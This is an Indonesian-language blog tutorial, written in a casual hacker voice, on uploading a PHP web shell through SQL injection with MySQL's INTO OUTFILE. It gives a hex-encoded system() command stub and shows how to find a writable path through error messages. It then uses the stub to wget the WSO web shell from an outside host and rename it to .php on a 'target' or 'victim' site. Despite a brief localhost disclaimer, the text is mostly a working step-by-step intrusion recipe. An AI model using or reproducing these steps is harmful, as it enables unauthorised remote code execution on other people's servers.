Oke sebetulnya saya pengetahuan tentang sql injection kurang, namun saya berusaha untuk bisa :'v latihan dan latihan :v. tutorial kali ini adalah bagaiaman cara upload shell via sql injection menggunakan Query "into outfile" yang fungsinya hampir sama dengan fopen() fwrite() pada PHP.
Mohon maaf :'v karena ini hanya simulasi jadi saya menggunakan localhost sebagai percobaan :p , gak baik juga website orang buat percobaan :v . Oke langsung saja ke stepsnya:
Yang anda butuhkan :
1. Hackbar : install sini
2. browser firefox
3. Koneksi internet
4. Otak.
Langkah :
1. Siapkan target terlebih dahulu , jika anda baru mencoba saya sarankan untuk menggunakan localhost atau website anda sendiri :)
2. di sini saya tidak menerangkan dari awal namun di sini pastikan anda sudah menemukan angka yang muncul di website tersebut seperti di gambar :
 | ||||
| Pastikan anda sudah dalam kondisi seperti ini |
3. Jika Angka vulnerable sudah muncul,sekarang anda tinggal menambahkan script di bawah ini :
<?php system($_GET['wos']); ?>
dan di convert ke hexa menjadi seperti ini :
0x3c3f7068702073797374656d28245f4745545b27776f73275d293b203f3e
lalu taruh string hexa tersebut di angka yang keluar tadi.
 |
| perhatikan hackbarnya |
eits.. setelah itu apa? jangan enter dulu ada yang kurang.
4. Setelah itu sudah tersusun sekarang coba cari path / directory root nya yang writable sehingga tidak terjadi error 403 :v , anda bisa mencari path atau directory root dengan memanfaatkan pesan error pada website korban sebagai contoh :
 |
| menambahkan ' (petik) pada parameter id dan mucul error |
5. Nah sekarang udah ketemu path nya, dan selanjutnya kita langsung eksekusi INTO OUTFILE
dengan menambahkan string into+outfile+'/path/path/shell.php' di belakang int terakhir union select . bingung? lihat gambar!
 | ||
| jika sudah tekan enter dan akan muncul error lagi |
7. dan yeay.. ternyata file yg di buat berhasil :) , kenapa error? gblk! -_- ente belum memasukan perintah :v ,dengan cara ? lihat gambar wae :
 |
| perintah filemu.php?wos=ls -lia |
8. ww jika sudah seperti itu kita execute dengan wget :
http://target.com/filemu.php?wos=wget http://www.w0rms.com/shell/wso.txt
9. jika sudah cek file wso.txt apakah sudah terpanggil ?
http://target.com/wso.txt atau http://target.com/path/wso.txt
10. ww ternyata udah ada filenya :v sekarang kembali lagi ke file mu yang bisa menjalankan perintah tadi, dan gantinama wso.txt tersebut menjadi wso.php dengan perintah :
http://target.com/filemu.php?wos=mv wso.txt wso.php
11. finally sekarang coba lihat
http://target.com/wso.php atau http://target.com/path/wso.php
dan taraaa....
12 . berhasil dah.. :"
NB : Cara di atas tidak bekerja pada server windows karena perintah yang di gunakan berbeda :).
0 comments:
Post a Comment